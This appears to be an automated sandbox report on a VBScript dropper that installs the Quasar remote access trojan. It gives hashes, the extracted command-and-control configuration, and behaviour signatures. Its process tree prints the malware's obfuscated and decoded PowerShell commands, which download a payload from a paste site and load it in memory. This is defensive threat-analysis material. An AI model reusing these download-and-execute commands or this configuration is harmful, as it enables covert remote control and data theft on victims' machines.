Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
17-05-2024 01:56
General
-
Target
c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4.vbs
-
Size
197KB
-
MD5
4730787ad81772f8d9b03ae8faf9efc3
-
SHA1
4d09795bab624a2dbeb62a14870693f8c0dc810c
-
SHA256
c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4
-
SHA512
d7b28b0377fd0ec04d105a6c3ee3ae92ff98d29b3d8aa1d1c677817fad4b9816126eb4e7e23376d60dd1d263dd0e3ad182732b2e2c8ee0cfa54c64440fdaeaec
-
SSDEEP
384:z1OlYw8nrW9LrBppppppppppppppppppppNGpppppppppppppppppppppppppppf:sfirg/LNA
Malware Config
Extracted
https://pasteio.com/download/xcxWvykfm30a
Extracted
quasar
1.4.1
aldo_R3GON
peurnick24.bumbleshrimp.com:7310
77413eeb-5d1c-4bf8-986f-3c9d48a16cd6
-
encryption_key
A3226D93494A561FEC5149605B952B09B55012C6
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Detects Windows executables referencing non-Windows User-Agents 1 IoCs
-
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
-
Detects executables containing common artifacts observed in infostealers 1 IoCs
-
Detects executables packed with Yano Obfuscator 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\AppData\Local\Temp\c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD58b56ab7631860454473cf924d0e1da02
SHA1cd3b8705f1008e1a2a19bd363ab0b291fd9ebd38
SHA2565624dd2edd0d950b56787cd937043d9c43ad667ac5471090e21cc0d2313eaa18
SHA512efe7cdf0dad52799a624c33878cacaca5bfeb08bc3fbb78cbdc768b92fa6c83e16b38dfd95a9fa4947d757b9ab276990fee02ae26abdea7b4fd32bf246c74f20
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.1MB
-
Filesize
712KB
-
Filesize
408KB
-
Filesize
3.1MB
-
Filesize
240KB
-
Filesize
72KB
-
Filesize
320KB
-
Filesize
40KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
40KB